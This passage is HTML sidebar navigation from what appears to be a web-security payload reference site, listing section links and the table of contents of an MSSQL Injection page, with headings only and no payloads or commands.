<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Serialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Insecure%20Deserialization/YAML/" class="md-nav__link">
<span class="md-ellipsis">
YAML Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Kubernetes
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Kubernetes
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTex Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Miscellaneous%20-%20Tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous & Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management & CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Subdomains%20Enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" checked>
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../HQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Hibernate Query Language Injection
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
MSSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-default-databases" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Default Databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-comments" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Comments
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-user" class="md-nav__link">
<span class="md-ellipsis">
MSSQL User
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-version" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Version
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-hostname" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Hostname
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-database-name" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Database name
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-database-credentials" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Database Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-databases" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List databases
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-columns" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List columns
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-list-tables" class="md-nav__link">
<span class="md-ellipsis">
MSSQL List tables
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-union-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Union Based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-error-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Error based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-blind-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Blind based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-time-based" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Time based
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-stacked-query" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Stacked Query
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-read-file" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Read file
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-command-execution" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Command execution
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-out-of-band" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Out of band
</span>
</a>
<nav class="md-nav" aria-label="MSSQL Out of band">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#mssql-dns-exfiltration" class="md-nav__link">
<span class="md-ellipsis">
MSSQL DNS exfiltration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-unc-path" class="md-nav__link">
<span class="md-ellipsis">
MSSQL UNC Path
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#mssql-make-user-dba-db-admin" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Make user DBA (DB admin)
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-trusted-links" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Trusted Links
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#list-permissions" class="md-nav__link">
<span class="md-ellipsis">
List permissions
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#mssql-opsec" class="md-nav__link">
<span class="md-ellipsis">
MSSQL OPSEC
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="../MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
